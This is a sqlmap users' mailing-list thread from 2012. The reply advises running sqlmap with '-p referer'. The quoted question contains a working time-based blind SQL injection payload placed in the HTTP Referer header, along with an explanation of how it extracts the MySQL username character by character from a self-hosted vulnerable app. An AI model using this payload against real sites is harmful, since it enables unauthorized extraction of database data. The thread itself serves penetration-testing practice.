Re: [sqlmap-users] sqlmap SQL blind time-based injection (MySQL)
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] sqlmap SQL blind time-based injection (MySQL)
|
From: Miroslav S. <mir...@gm...> - 2012-10-09 08:26:46
|
Hi Alton. Please update to the latest revision and run sqlmap with the: -p referer. Kind regards, Miroslav Stampar On Sun, Oct 7, 2012 at 11:25 PM, Alton Johnson <alt...@gm...> wrote: > In my situation, my vulnerable parameter is Referer in the HTTP > headers. I am able to enumerate the username and database name > manually, but can someone explain or point me to an article that gives > details about sqlmap and time-based with mysql? Here is an example of > how I was able to enumerate the name. I'm unsure if there's any > "custom" way of getting sqlmap work with this. > > Code: > GET /vulnwebapp/index.php?id=2 HTTP/1.1 > Host: 192.168.127.133 > Proxy-Connection: keep-alive > User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, > like Gecko) Chrome/22.0.1229.79 Safari/537.4 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+' > Accept-Encoding: gzip,deflate,sdch > Accept-Language: en-US,en;q=0.8 > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 > > FYI, I'm testing this on a vulnerable web app hosted by myself. So > with the above request, the page sleeps because the first character of > the current username is "r", which eventually allows me to change 1,1 > to 2,1 and so forth until I figure out that the username is "root." > > Is there any way to get sqlmap to assist with this type of attack? > > Thanks, > > > ------------------------------------------------------------------------------ > Don't let slow site performance ruin your business. Deploy New Relic APM > Deploy New Relic app performance management and know exactly > what is happening inside your Ruby, Python, PHP, Java, and .NET app > Try New Relic at no cost today and get our sweet Data Nerd shirt too! > http://p.sf.net/sfu/newrelic-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
